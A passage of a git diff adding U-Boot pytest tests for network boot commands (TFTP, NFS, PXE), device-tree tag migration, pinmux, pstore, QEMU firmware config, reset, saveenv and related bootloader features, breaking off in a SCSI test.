else: + output = u_boot_console.run_command('tftpboot %x %s' % (addr, fn)) + expected_text = 'Bytes transferred = ' + sz = f.get('size', None) + if sz: + expected_text += '%d' % sz + assert expected_text in output + + expected_crc = f.get('crc32', None) + if not expected_crc: + return + + if u_boot_console.config.buildconfig.get('config_cmd_crc32', 'n') != 'y': + return + + output = u_boot_console.run_command('crc32 $fileaddr $filesize') + assert expected_crc in output + +@pytest.mark.buildconfigspec('cmd_nfs') +def test_net_nfs(u_boot_console): + """Test the nfs command. + + A file is downloaded from the NFS server, its size and optionally its + CRC32 are validated. + + The details of the file to download are provided by the boardenv_* file; + see the comment at the beginning of this file. + """ + + if not net_set_up: + pytest.skip('Network not initialized') + + f = u_boot_console.config.env.get('env__net_nfs_readable_file', None) + if not f: + pytest.skip('No NFS readable file to read') + + addr = f.get('addr', None) + if not addr: + addr = u_boot_utils.find_ram_base(u_boot_console) + + fn = f['fn'] + output = u_boot_console.run_command('nfs %x %s' % (addr, fn)) + expected_text = 'Bytes transferred = ' + sz = f.get('size', None) + if sz: + expected_text += '%d' % sz + assert expected_text in output + + expected_crc = f.get('crc32', None) + if not expected_crc: + return + + if u_boot_console.config.buildconfig.get('config_cmd_crc32', 'n') != 'y': + return + + output = u_boot_console.run_command('crc32 %x $filesize' % addr) + assert expected_crc in output + +@pytest.mark.buildconfigspec("cmd_net") +@pytest.mark.buildconfigspec("cmd_pxe") +def test_net_pxe_get(u_boot_console): + """Test the pxe get command. + + A pxe configuration file is downloaded from the TFTP server and interpreted + to boot the images mentioned in pxe configuration file. + + The details of the file to download are provided by the boardenv_* file; + see the comment at the beginning of this file. 
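The assertions below follow the usual pxelinux configuration-file search order. As a worked example with illustrative values only (ipaddr 10.0.0.100, hex form 0A000064), the output is expected to contain 'Retrieving file:' lines for:

    pxelinux.cfg/<pxeuuid>                      # the UUID set just before 'pxe get'
    pxelinux.cfg/01-<ethaddr with ':' as '-'>   # MAC-address form
    pxelinux.cfg/0A000064                       # full IP in uppercase hex
    pxelinux.cfg/0A00006 ... pxelinux.cfg/0A    # progressively shortened prefixes
    pxelinux.cfg/default                        # final fallback

The hex string and its prefixes are derived from whatever $ipaddr the board actually has; 10.0.0.100 is used here only to make the example concrete.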
+ """ + + if not net_set_up: + pytest.skip("Network not initialized") + + test_net_setup_static(u_boot_console) + + f = u_boot_console.config.env.get("env__net_pxe_readable_file", None) + if not f: + pytest.skip("No PXE readable file to read") + + addr = f.get("addr", None) + timeout = f.get("timeout", u_boot_console.p.timeout) + + pxeuuid = uuid.uuid1() + u_boot_console.run_command(f"setenv pxeuuid {pxeuuid}") + expected_text_uuid = f"Retrieving file: pxelinux.cfg/{pxeuuid}" + + ethaddr = u_boot_console.run_command("echo $ethaddr") + ethaddr = ethaddr.replace(':', '-') + expected_text_ethaddr = f"Retrieving file: pxelinux.cfg/01-{ethaddr}" + + ip = u_boot_console.run_command("echo $ipaddr") + ip = ip.split('.') + ipaddr_file = "".join(['%02x' % int(x) for x in ip]).upper() + expected_text_ipaddr = f"Retrieving file: pxelinux.cfg/{ipaddr_file}" + expected_text_default = f"Retrieving file: pxelinux.cfg/default" + + with u_boot_console.temporary_timeout(timeout): + output = u_boot_console.run_command("pxe get") + + assert "TIMEOUT" not in output + assert expected_text_uuid in output + assert expected_text_ethaddr in output + assert expected_text_ipaddr in output + + i = 1 + for i in range(0, len(ipaddr_file) - 1): + expected_text_ip = f"Retrieving file: pxelinux.cfg/{ipaddr_file[:-i]}" + assert expected_text_ip in output + i += 1 + + assert expected_text_default in output + assert "Config file 'default.boot' found" in output + +@pytest.mark.buildconfigspec("cmd_crc32") +@pytest.mark.buildconfigspec("cmd_net") +@pytest.mark.buildconfigspec("cmd_tftpput") +def test_net_tftpput(u_boot_console): + """Test the tftpput command. + + A file is downloaded from the TFTP server and then uploaded to the TFTP + server, its size and its CRC32 are validated. + + The details of the file to download are provided by the boardenv_* file; + see the comment at the beginning of this file. 
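Two details of the flow below are easy to miss, noted here with illustrative values only: if the boardenv omits 'fnu', the upload name is built from a timestamp plus the download name, and the verification download of the uploaded copy is placed past the original buffer so its recorded CRC32 stays intact.

    # hypothetical default upload name (timestamp invented for this example):
    #   240101120000_ubtest-readable.bin
    # the uploaded copy is fetched back at addr + size, leaving the original
    # download buffer untouched for the final CRC32 comparison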
+ """ + + if not net_set_up: + pytest.skip("Network not initialized") + + f = u_boot_console.config.env.get("env__net_tftp_readable_file", None) + if not f: + pytest.skip("No TFTP readable file to read") + + addr = f.get("addr", None) + if not addr: + addr = u_boot_utils.find_ram_base(u_boot_console) + + sz = f.get("size", None) + timeout = f.get("timeout", u_boot_console.p.timeout) + fn = f["fn"] + fnu = f.get("fnu", "_".join([datetime.datetime.now().strftime("%y%m%d%H%M%S"), fn])) + expected_text = "Bytes transferred = " + if sz: + expected_text += "%d" % sz + + with u_boot_console.temporary_timeout(timeout): + output = u_boot_console.run_command("tftpboot %x %s" % (addr, fn)) + + assert "TIMEOUT" not in output + assert expected_text in output + + expected_tftpb_crc = f.get("crc32", None) + + output = u_boot_console.run_command("crc32 $fileaddr $filesize") + assert expected_tftpb_crc in output + + with u_boot_console.temporary_timeout(timeout): + output = u_boot_console.run_command( + "tftpput $fileaddr $filesize $serverip:%s" % (fnu) + ) + + expected_text = "Bytes transferred = " + if sz: + expected_text += "%d" % sz + addr = addr + sz + assert "TIMEOUT" not in output + assert "Access violation" not in output + assert expected_text in output + + with u_boot_console.temporary_timeout(timeout): + output = u_boot_console.run_command("tftpboot %x %s" % (addr, fnu)) + + expected_text = "Bytes transferred = " + if sz: + expected_text += "%d" % sz + assert "TIMEOUT" not in output + assert expected_text in output + + output = u_boot_console.run_command("crc32 $fileaddr $filesize") + assert expected_tftpb_crc in output diff --git a/test/py/tests/test_of_migrate.py b/test/py/tests/test_of_migrate.py new file mode 100644 index 00000000000..910f7c05510 --- /dev/null +++ b/test/py/tests/test_of_migrate.py @@ -0,0 +1,108 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright 2023 Google LLC +# Written by Simon Glass <sjg@chromium.org> + +"""Test handling of unmigrated u-boot,dm- tags""" + +import os +import pytest + +import u_boot_utils as util + +# This is needed for Azure, since the default '..' 
directory is not writeable +TMPDIR1 = '/tmp/test_no_migrate' +TMPDIR2 = '/tmp/test_no_migrate_spl' +TMPDIR3 = '/tmp/test_migrate' + +def build_for_migrate(cons, replace_pair, board, tmpdir, disable_migrate=True): + """Build an updated U-Boot with a slightly modified device tree + + Args: + cons (ConsoleBase): U-Boot console + replace_pair (tuple): + String to find + String to replace it with + board (str): Board to build + tmpdir (str): Temporary directory to use + disable_migrate (bool): True to disable CONFIG_OF_TAG_MIGRATE in build + """ + srcdir = cons.config.source_dir + build_dir = cons.config.build_dir + + # Get the source for the existing dts + dt_dir = os.path.join(build_dir, 'arch', 'sandbox', 'dts') + orig_fname = os.path.join(dt_dir, 'sandbox.dtb') + out_dts = os.path.join(dt_dir, 'sandbox_out.dts') + util.run_and_log(cons, ['dtc', orig_fname, '-I', 'dtb', '-O', 'dts', + '-o', out_dts]) + + # Update it to use an old tag + with open(out_dts) as inf: + data = inf.read() + data = data.replace(*replace_pair) + + dts_fname = os.path.join(dt_dir, 'sandbox_oldtag.dts') + with open(dts_fname, 'w') as outf: + print(data, file=outf) + dtb_fname = os.path.join(dt_dir, 'sandbox_oldtag.dtb') + util.run_and_log(cons, ['dtc', dts_fname, '-o', dtb_fname]) + + migrate = ['-a', '~CONFIG_OF_TAG_MIGRATE'] if disable_migrate else [] + + # Build sandbox with this new dtb, turning off OF_TAG_MIGRATE + env = dict(os.environ) + env['EXT_DTB'] = dtb_fname + env['DEVICE_TREE'] = 'sandbox_new' + env['NO_LTO'] = '1' # Speed up build + out = util.run_and_log( + cons, ['./tools/buildman/buildman', '-m', '--board', board, + *migrate, '-w', '-o', tmpdir], ignore_errors=True, env=env) + return out + +@pytest.mark.slow +@pytest.mark.boardspec('sandbox') +def test_of_no_migrate(u_boot_console): + """Test sandbox with old boot phase tags like u-boot,dm-pre-proper""" + cons = u_boot_console + + build_for_migrate(cons, ['bootph-some-ram', 'u-boot,dm-pre-proper'], + 'sandbox', TMPDIR1) + + # It should fail to run, since the lcd device will not be bound before + # relocation. 
so won't get its frame-buffer memory + out = util.run_and_log( + cons, [os.path.join(TMPDIR1, 'u-boot'), '-D', '-c', 'help'], + ignore_errors=True) + assert "Video device 'lcd' cannot allocate frame buffer memory" in out + + +@pytest.mark.slow +@pytest.mark.boardspec('sandbox_spl') +@pytest.mark.boardspec('spl_of_platdata_inst') +@pytest.mark.boardspec('!sandbox_tpl') +def test_of_no_migrate_spl(u_boot_console): + """Test sandbox with old boot phase tags like u-boot,dm-spl""" + cons = u_boot_console + + out = build_for_migrate(cons, ['bootph-pre-ram', 'u-boot,dm-spl'], + 'sandbox_spl', TMPDIR2) + + # It should fail to build, since the SPL DT will not include 'spl-test' + # node, among others + assert "undefined type ‘struct dtd_sandbox_spl_test’" in out + + +@pytest.mark.slow +@pytest.mark.boardspec('sandbox') +def test_of_migrate(u_boot_console): + """Test sandbox shows a message when tags were migrated""" + cons = u_boot_console + + build_for_migrate(cons, ['bootph-some-ram', 'u-boot,dm-pre-proper'], + 'sandbox', TMPDIR3, disable_migrate=False) + + # It should show a migration message + out = util.run_and_log( + cons, [os.path.join(TMPDIR3, 'u-boot'), '-D', '-c', 'help'], + ignore_errors=True) + assert "Warning: Device tree includes old 'u-boot,dm-' tags" in out diff --git a/test/py/tests/test_ofplatdata.py b/test/py/tests/test_ofplatdata.py new file mode 100644 index 00000000000..51a188454f3 --- /dev/null +++ b/test/py/tests/test_ofplatdata.py @@ -0,0 +1,23 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2016 Google, Inc + +import pytest +import u_boot_utils as util + +@pytest.mark.boardspec('sandbox_spl') +@pytest.mark.buildconfigspec('spl_of_platdata') +def test_spl_devicetree(u_boot_console): + """Test content of spl device-tree""" + cons = u_boot_console + dtb = cons.config.build_dir + '/spl/u-boot-spl.dtb' + fdtgrep = cons.config.build_dir + '/tools/fdtgrep' + output = util.run_and_log(cons, [fdtgrep, '-l', dtb]) + + assert "bootph-all" not in output + assert "bootph-some-ram" not in output + assert "bootph-pre-ram" not in output + assert "bootph-pre-sram" not in output + + assert "spl-test5" not in output + assert "spl-test6" not in output + assert "spl-test7" in output diff --git a/test/py/tests/test_part.py b/test/py/tests/test_part.py new file mode 100644 index 00000000000..2b5184654db --- /dev/null +++ b/test/py/tests/test_part.py @@ -0,0 +1,14 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2020 +# Niel Fourie, DENX Software Engineering, lusus@denx.de + +import pytest + +@pytest.mark.buildconfigspec('cmd_part') +@pytest.mark.buildconfigspec('partitions') +@pytest.mark.buildconfigspec('efi_partition') +def test_part_types(u_boot_console): + """Test that `part types` prints a result which includes `EFI`.""" + output = u_boot_console.run_command('part types') + assert "Supported partition tables:" in output + assert "EFI" in output diff --git a/test/py/tests/test_pinmux.py b/test/py/tests/test_pinmux.py new file mode 100644 index 00000000000..794994e12d1 --- /dev/null +++ b/test/py/tests/test_pinmux.py @@ -0,0 +1,85 @@ +# SPDX-License-Identifier: GPL-2.0 + +import pytest +import u_boot_utils + +@pytest.mark.buildconfigspec('cmd_pinmux') +def test_pinmux_usage_1(u_boot_console): + """Test that 'pinmux' command without parameters displays + pinmux usage.""" + output = u_boot_console.run_command('pinmux') + assert 'Usage:' in output + +@pytest.mark.buildconfigspec('cmd_pinmux') +def test_pinmux_usage_2(u_boot_console): + """Test that 'pinmux status' executed 
without previous "pinmux dev" + command displays error message.""" + output = u_boot_console.run_command('pinmux status') + assert 'pin-controller device not selected' in output + +@pytest.mark.buildconfigspec('cmd_pinmux') +@pytest.mark.boardspec('sandbox') +def test_pinmux_status_all(u_boot_console): + """Test that 'pinmux status -a' displays pin's muxing.""" + output = u_boot_console.run_command('pinmux status -a') + + assert ('pinctrl-gpio:' in output) + assert ('a5 : gpio output .' in output) + assert ('a6 : gpio output .' in output) + + assert ('pinctrl:' in output) + assert ('P0 : UART TX.' in output) + assert ('P1 : UART RX.' in output) + assert ('P2 : I2S SCK.' in output) + assert ('P3 : I2S SD.' in output) + assert ('P4 : I2S WS.' in output) + assert ('P5 : GPIO0 bias-pull-up input-disable.' in output) + assert ('P6 : GPIO1 drive-open-drain.' in output) + assert ('P7 : GPIO2 bias-pull-down input-enable.' in output) + assert ('P8 : GPIO3 bias-disable.' in output) + +@pytest.mark.buildconfigspec('cmd_pinmux') +@pytest.mark.boardspec('sandbox') +def test_pinmux_list(u_boot_console): + """Test that 'pinmux list' returns the pin-controller list.""" + output = u_boot_console.run_command('pinmux list') + assert 'sandbox_pinctrl' in output + +@pytest.mark.buildconfigspec('cmd_pinmux') +def test_pinmux_dev_bad(u_boot_console): + """Test that 'pinmux dev' returns an error when trying to select a + wrong pin controller.""" + pincontroller = 'bad_pin_controller_name' + output = u_boot_console.run_command('pinmux dev ' + pincontroller) + expected_output = 'Can\'t get the pin-controller: ' + pincontroller + '!' + assert (expected_output in output) + +@pytest.mark.buildconfigspec('cmd_pinmux') +@pytest.mark.boardspec('sandbox') +def test_pinmux_dev(u_boot_console): + """Test that 'pinmux dev' select the wanted pin controller.""" + pincontroller = 'pinctrl' + output = u_boot_console.run_command('pinmux dev ' + pincontroller) + expected_output = 'dev: ' + pincontroller + assert (expected_output in output) + +@pytest.mark.buildconfigspec('cmd_pinmux') +@pytest.mark.boardspec('sandbox') +def test_pinmux_status(u_boot_console): + """Test that 'pinmux status' displays selected pincontroller's pin + muxing descriptions.""" + u_boot_console.run_command('pinmux dev pinctrl') + output = u_boot_console.run_command('pinmux status') + + assert (not 'pinctrl-gpio:' in output) + assert (not 'pinctrl:' in output) + + assert ('P0 : UART TX.' in output) + assert ('P1 : UART RX.' in output) + assert ('P2 : I2S SCK.' in output) + assert ('P3 : I2S SD.' in output) + assert ('P4 : I2S WS.' in output) + assert ('P5 : GPIO0 bias-pull-up input-disable.' in output) + assert ('P6 : GPIO1 drive-open-drain.' in output) + assert ('P7 : GPIO2 bias-pull-down input-enable.' in output) + assert ('P8 : GPIO3 bias-disable.' 
in output) diff --git a/test/py/tests/test_pstore.py b/test/py/tests/test_pstore.py new file mode 100644 index 00000000000..5a35724f60a --- /dev/null +++ b/test/py/tests/test_pstore.py @@ -0,0 +1,77 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2020, Collabora +# Author: Frédéric Danis <frederic.danis@collabora.com> + +import pytest +import u_boot_utils +import os +import tempfile +import shutil + +PSTORE_ADDR=0x3000000 +PSTORE_LENGTH=0x100000 +PSTORE_PANIC1='test/py/tests/test_pstore_data_panic1.hex' +PSTORE_PANIC2='test/py/tests/test_pstore_data_panic2.hex' +PSTORE_CONSOLE='test/py/tests/test_pstore_data_console.hex' +ADDR=0x01000008 + +def load_pstore(u_boot_console): + """Load PStore records from sample files""" + + output = u_boot_console.run_command_list([ + 'host load hostfs - 0x%x %s' % (PSTORE_ADDR, + os.path.join(u_boot_console.config.source_dir, PSTORE_PANIC1)), + 'host load hostfs - 0x%x %s' % (PSTORE_ADDR + 4096, + os.path.join(u_boot_console.config.source_dir, PSTORE_PANIC2)), + 'host load hostfs - 0x%x %s' % (PSTORE_ADDR + 253 * 4096, + os.path.join(u_boot_console.config.source_dir, PSTORE_CONSOLE)), + 'pstore set 0x%x 0x%x' % (PSTORE_ADDR, PSTORE_LENGTH)]) + +def checkfile(u_boot_console, path, filesize, checksum): + """Check file against MD5 checksum""" + + output = u_boot_console.run_command_list([ + 'load hostfs - %x %s' % (ADDR, path), + 'printenv filesize']) + assert('filesize=%x' % (filesize) in ''.join(output)) + + output = u_boot_console.run_command_list([ + 'md5sum %x $filesize' % ADDR, + 'setenv filesize']) + assert(checksum in ''.join(output)) + +@pytest.mark.buildconfigspec('cmd_pstore') +def test_pstore_display_all_records(u_boot_console): + """Test that pstore displays all records.""" + + u_boot_console.run_command('') + load_pstore(u_boot_console) + response = u_boot_console.run_command('pstore display') + assert('**** Dump' in response) + assert('**** Console' in response) + +@pytest.mark.buildconfigspec('cmd_pstore') +def test_pstore_display_one_record(u_boot_console): + """Test that pstore displays only one record.""" + + u_boot_console.run_command('') + load_pstore(u_boot_console) + response = u_boot_console.run_command('pstore display dump 1') + assert('Panic#2 Part1' in response) + assert('**** Console' not in response) + +@pytest.mark.buildconfigspec('cmd_pstore') +def test_pstore_save_records(u_boot_console): + """Test that pstore saves all records.""" + + outdir = tempfile.mkdtemp() + + u_boot_console.run_command('') + load_pstore(u_boot_console) + u_boot_console.run_command('pstore save hostfs - %s' % (outdir)) + + checkfile(u_boot_console, '%s/dmesg-ramoops-0' % (outdir), 3798, '8059335ab4cfa62c77324c491659c503') + checkfile(u_boot_console, '%s/dmesg-ramoops-1' % (outdir), 4035, '3ff30df3429d81939c75d0070b5187b9') + checkfile(u_boot_console, '%s/console-ramoops-0' % (outdir), 4084, 'bb44de4a9b8ebd9b17ae98003287325b') + + shutil.rmtree(outdir) diff --git a/test/py/tests/test_pstore_data_console.hex b/test/py/tests/test_pstore_data_console.hex Binary files differnew file mode 100644 index 00000000000..e7f426e8928 --- /dev/null +++ b/test/py/tests/test_pstore_data_console.hex diff --git a/test/py/tests/test_pstore_data_panic1.hex b/test/py/tests/test_pstore_data_panic1.hex Binary files differnew file mode 100644 index 00000000000..988929d12c2 --- /dev/null +++ b/test/py/tests/test_pstore_data_panic1.hex diff --git a/test/py/tests/test_pstore_data_panic2.hex b/test/py/tests/test_pstore_data_panic2.hex Binary files differnew file mode 100644 
index 00000000000..8f9d56cbe01 --- /dev/null +++ b/test/py/tests/test_pstore_data_panic2.hex diff --git a/test/py/tests/test_qfw.py b/test/py/tests/test_qfw.py new file mode 100644 index 00000000000..8b668c9721a --- /dev/null +++ b/test/py/tests/test_qfw.py @@ -0,0 +1,26 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2021, Asherah Connor <ashe@kivikakk.ee> + +# Test qfw command implementation + +import pytest + +@pytest.mark.buildconfigspec('cmd_qfw') +def test_qfw_cpus(u_boot_console): + "Test QEMU firmware config reports the CPU count." + + output = u_boot_console.run_command('qfw cpus') + # The actual number varies depending on the board under test, so only + # assert a non-zero output. + assert 'cpu(s) online' in output + assert '0 cpu(s) online' not in output + +@pytest.mark.buildconfigspec('cmd_qfw') +def test_qfw_list(u_boot_console): + "Test QEMU firmware config lists devices." + + output = u_boot_console.run_command('qfw list') + # Assert either: + # 1) 'test-one', from the sandbox driver, or + # 2) 'bootorder', found in every real QEMU implementation. + assert ("bootorder" in output) or ("test-one" in output) diff --git a/test/py/tests/test_reset.py b/test/py/tests/test_reset.py new file mode 100644 index 00000000000..00fc31da57d --- /dev/null +++ b/test/py/tests/test_reset.py @@ -0,0 +1,63 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +""" +Note: This test doesn't rely on boardenv_* configuration value but they can +change test behavior. + +For example: + +# Setup env__reset_test_skip to True if reset test is not possible or desired +# and should be skipped. +env__reset_test_skip = True + +# Setup env__reset_test to set the bootmode if 'modeboot' u-boot environment +# variable is not set. Test will be skipped if bootmode is not set in both +# places i.e, boardenv and modeboot u-boot environment variable +env__reset_test = { + 'bootmode': 'qspiboot', +} + +# This test will be also skipped if the bootmode is detected to JTAG. +""" + +import pytest +import test_000_version + +def setup_reset_env(u_boot_console): + if u_boot_console.config.env.get('env__reset_test_skip', False): + pytest.skip('reset test is not enabled') + + output = u_boot_console.run_command('echo $modeboot') + if output: + bootmode = output + else: + f = u_boot_console.config.env.get('env__reset_test', None) + if not f: + pytest.skip('bootmode cannot be determined') + bootmode = f.get('bootmode', 'jtagboot') + + if 'jtag' in bootmode: + pytest.skip('skipping reset test due to jtag bootmode') + +@pytest.mark.buildconfigspec('hush_parser') +def test_reset(u_boot_console): + """Test the reset command in non-JTAG bootmode. + It does COLD reset, which resets CPU, DDR and peripherals + """ + setup_reset_env(u_boot_console) + u_boot_console.run_command('reset', wait_for_reboot=True) + + # Checks the u-boot command prompt's functionality after reset + test_000_version.test_version(u_boot_console) + +@pytest.mark.buildconfigspec('hush_parser') +def test_reset_w(u_boot_console): + """Test the reset -w command in non-JTAG bootmode. + It does WARM reset, which resets CPU but keep DDR/peripherals active. 
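setup_reset_env() first consults the 'modeboot' U-Boot variable and only falls back to the boardenv when that variable is empty; any JTAG boot mode is always skipped. A hypothetical boardenv_* snippet for a QSPI-booted board with no 'modeboot' variable could be:

    env__reset_test_skip = False    # may also be omitted entirely
    env__reset_test = {
        'bootmode': 'qspiboot',
    }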
+ """ + setup_reset_env(u_boot_console) + u_boot_console.run_command('reset -w', wait_for_reboot=True) + + # Checks the u-boot command prompt's functionality after reset + test_000_version.test_version(u_boot_console) diff --git a/test/py/tests/test_sandbox_exit.py b/test/py/tests/test_sandbox_exit.py new file mode 100644 index 00000000000..706f5fa3594 --- /dev/null +++ b/test/py/tests/test_sandbox_exit.py @@ -0,0 +1,45 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2015 Stephen Warren +# Copyright (c) 2015-2016, NVIDIA CORPORATION. All rights reserved. + +import pytest +import signal + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('sysreset_cmd_poweroff') +def test_poweroff(u_boot_console): + """Test that the "poweroff" command exits sandbox process.""" + + u_boot_console.run_command('poweroff', wait_for_prompt=False) + assert(u_boot_console.validate_exited()) + +@pytest.mark.boardspec('sandbox') +def test_ctrl_c(u_boot_console): + """Test that sending SIGINT to sandbox causes it to exit.""" + + u_boot_console.kill(signal.SIGINT) + assert(u_boot_console.validate_exited()) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_exception') +@pytest.mark.buildconfigspec('sandbox_crash_reset') +def test_exception_reset(u_boot_console): + """Test that SIGILL causes a reset.""" + + u_boot_console.run_command('exception undefined', wait_for_prompt=False) + m = u_boot_console.p.expect(['resetting ...', 'U-Boot']) + if m != 0: + raise Exception('SIGILL did not lead to reset') + m = u_boot_console.p.expect(['U-Boot', '=>']) + if m != 0: + raise Exception('SIGILL did not lead to reset') + u_boot_console.restart_uboot() + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_exception') +@pytest.mark.notbuildconfigspec('sandbox_crash_reset') +def test_exception_exit(u_boot_console): + """Test that SIGILL causes a reset.""" + + u_boot_console.run_command('exception undefined', wait_for_prompt=False) + assert(u_boot_console.validate_exited()) diff --git a/test/py/tests/test_sandbox_opts.py b/test/py/tests/test_sandbox_opts.py new file mode 100644 index 00000000000..422b43cb3bc --- /dev/null +++ b/test/py/tests/test_sandbox_opts.py @@ -0,0 +1,30 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright 2022 Google LLC +# Written by Simon Glass <sjg@chromium.org> + +import pytest + +import u_boot_utils as util + +# This is needed for Azure, since the default '..' directory is not writeable +TMPDIR = '/tmp/test_cmdline' + +@pytest.mark.slow +@pytest.mark.boardspec('sandbox') +def test_sandbox_cmdline(u_boot_console): + """Test building sandbox without CONFIG_CMDLINE""" + cons = u_boot_console + + out = util.run_and_log( + cons, ['./tools/buildman/buildman', '-m', '--board', 'sandbox', + '-a', '~CMDLINE', '-o', TMPDIR]) + +@pytest.mark.slow +@pytest.mark.boardspec('sandbox') +def test_sandbox_lto(u_boot_console): + """Test building sandbox without CONFIG_LTO""" + cons = u_boot_console + + out = util.run_and_log( + cons, ['./tools/buildman/buildman', '-m', '--board', 'sandbox', + '-a', '~LTO', '-o', TMPDIR]) diff --git a/test/py/tests/test_saveenv.py b/test/py/tests/test_saveenv.py new file mode 100644 index 00000000000..7faa3bdf93d --- /dev/null +++ b/test/py/tests/test_saveenv.py @@ -0,0 +1,137 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +""" +Note: This test doesn't rely on boardenv_* configuration value but they can +change test behavior. 
+ +For example: + +# Setup env__saveenv_test_skip to True if saveenv test is not possible or +# desired and should be skipped. +env__saveenv_test_skip = True + +# Setup env__saveenv_test to set the bootmode if 'modeboot' u-boot environment +# variable is not set. Test will be skipped if bootmode is not set in both +# places i.e, boardenv and modeboot u-boot environment variable +env__saveenv_test = { + 'bootmode': 'qspiboot', +} + +# This test will be also skipped if the bootmode is detected to JTAG. +""" + +import pytest +import random +import ipaddress +import string +import uuid + +# Setup the env +def setup_saveenv_env(u_boot_console): + if u_boot_console.config.env.get('env__saveenv_test_skip', False): + pytest.skip('saveenv test is not enabled') + + output = u_boot_console.run_command('echo $modeboot') + if output: + bootmode = output + else: + f = u_boot_console.config.env.get('env__saveenv_test', None) + if not f: + pytest.skip('bootmode cannot be determined') + bootmode = f.get('bootmode', 'jtagboot') + + if 'jtag' in bootmode: + pytest.skip('skipping saveenv test due to jtag bootmode') + +# Check return code +def ret_code(u_boot_console): + return u_boot_console.run_command('echo $?') + +# Verify env variable +def check_env(u_boot_console, var_name, var_value): + if var_value: + output = u_boot_console.run_command(f'printenv {var_name}') + var_value = str(var_value) + if (var_value.startswith("'") and var_value.endswith("'")) or ( + var_value.startswith('"') and var_value.endswith('"') + ): + var_value = var_value.split(var_value[-1])[1] + assert var_value in output + assert ret_code(u_boot_console).endswith('0') + else: + u_boot_console.p.send(f'printenv {var_name}\n') + output = u_boot_console.p.expect(['not defined']) + assert output == 0 + assert ret_code(u_boot_console).endswith('1') + +# Set env variable +def set_env(u_boot_console, var_name, var_value): + u_boot_console.run_command(f'setenv {var_name} {var_value}') + assert ret_code(u_boot_console).endswith('0') + check_env(u_boot_console, var_name, var_value) + +@pytest.mark.buildconfigspec('cmd_saveenv') +@pytest.mark.buildconfigspec('hush_parser') +def test_saveenv(u_boot_console): + """Test the saveenv command in non-JTAG bootmode. + It saves the U-Boot environment in persistent storage. 
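One subtlety worth illustrating: check_env() strips a single layer of matching surrounding quotes before comparing, which is why the random string is set with quotes but verified against the bare value after the reboot. A hypothetical round trip:

    set_env(u_boot_console, 'str_var', '"hello u-boot"')
    # after 'saveenv' and 'reset', printenv str_var is expected to contain:
    #   hello u-boot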
+ """ + setup_saveenv_env(u_boot_console) + + # Set env for random mac address + rand_mac = '%02x:%02x:%02x:%02x:%02x:%02x' % ( + random.randint(0, 255), + random.randint(0, 255), + random.randint(0, 255), + random.randint(0, 255), + random.randint(0, 255), + random.randint(0, 255), + ) + set_env(u_boot_console, 'mac_addr', rand_mac) + + # Set env for random IPv4 address + rand_ipv4 = ipaddress.IPv4Address._string_from_ip_int( + random.randint(0, ipaddress.IPv4Address._ALL_ONES) + ) + set_env(u_boot_console, 'ipv4_addr', rand_ipv4) + + # Set env for random IPv6 address + rand_ipv6 = ipaddress.IPv6Address._string_from_ip_int( + random.randint(0, ipaddress.IPv6Address._ALL_ONES) + ) + set_env(u_boot_console, 'ipv6_addr', rand_ipv6) + + # Set env for random number + rand_num = random.randrange(1, 10**9) + set_env(u_boot_console, 'num_var', rand_num) + + # Set env for uuid + uuid_str = uuid.uuid4().hex.lower() + set_env(u_boot_console, 'uuid_var', uuid_str) + + # Set env for random string including special characters + sc = "!#%&()*+,-./:;<=>?@[\\]^_`{|}~" + rand_str = ''.join( + random.choices(' ' + string.ascii_letters + sc + string.digits, k=300) + ) + set_env(u_boot_console, 'str_var', f'"{rand_str}"') + + # Set env for empty string + set_env(u_boot_console, 'empty_var', '') + + # Save the env variables + u_boot_console.run_command('saveenv') + assert ret_code(u_boot_console).endswith('0') + + # Reboot + u_boot_console.run_command('reset', wait_for_reboot=True) + + # Verify the saved env variables + check_env(u_boot_console, 'mac_addr', rand_mac) + check_env(u_boot_console, 'ipv4_addr', rand_ipv4) + check_env(u_boot_console, 'ipv6_addr', rand_ipv6) + check_env(u_boot_console, 'num_var', rand_num) + check_env(u_boot_console, 'uuid_var', uuid_str) + check_env(u_boot_console, 'str_var', rand_str) + check_env(u_boot_console, 'empty_var', '') diff --git a/test/py/tests/test_scp03.py b/test/py/tests/test_scp03.py new file mode 100644 index 00000000000..1a104b365f7 --- /dev/null +++ b/test/py/tests/test_scp03.py @@ -0,0 +1,27 @@ +# Copyright (c) 2021 Foundries.io Ltd +# +# SPDX-License-Identifier: GPL-2.0+ +# +# SCP03 command test + +""" +This tests SCP03 command in U-Boot. + +For additional details check doc/usage/scp03.rst +""" + +import pytest +import u_boot_utils as util + +@pytest.mark.buildconfigspec('cmd_scp03') +def test_scp03(u_boot_console): + """Enable and provision keys with SCP03 + """ + + success_str1 = "SCP03 is enabled" + success_str2 = "SCP03 is provisioned" + + response = u_boot_console.run_command('scp03 enable') + assert success_str1 in response + response = u_boot_console.run_command('scp03 provision') + assert success_str2 in response diff --git a/test/py/tests/test_scsi.py b/test/py/tests/test_scsi.py new file mode 100644 index 00000000000..be2e283e7d2 --- /dev/null +++ b/test/py/tests/test_scsi.py @@ -0,0 +1,92 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest + +""" +Note: This test relies on boardenv_* containing configuration values to define +the SCSI device number, type and capacity. This test will be automatically +skipped without this. + +For example: + +# Setup env__scsi_device_test to set the SCSI device number/slot, the type of +device, and the device capacity in MB. 
